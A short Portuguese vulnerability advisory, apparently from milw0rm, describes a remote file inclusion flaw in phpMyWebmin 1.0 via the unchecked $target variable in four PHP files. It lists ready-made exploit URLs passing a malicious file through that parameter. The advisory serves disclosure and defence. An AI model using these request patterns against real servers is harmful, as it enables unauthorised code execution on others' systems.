phpMyWebmin 1.0 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $target dos arquivos change_preferences2.php, create_file.php, upload_local.php e upload_multi.php permitem a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: phpMyWebmin 1.0 e anteriores
Download: josh.ch
Código vulnerável (nos arquivos citados):

include("$target/$folder/preferences.php");

Desoberta por: XORON
Exploit:

http://host/change_preferences2.php?target=arquivomaligno?
http://host/create_file.php?target=arquivomaligno?
http://host/upload_local.php?target=arquivomaligno?
http://host/upload_multi.php?target=arquivomaligno?

Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com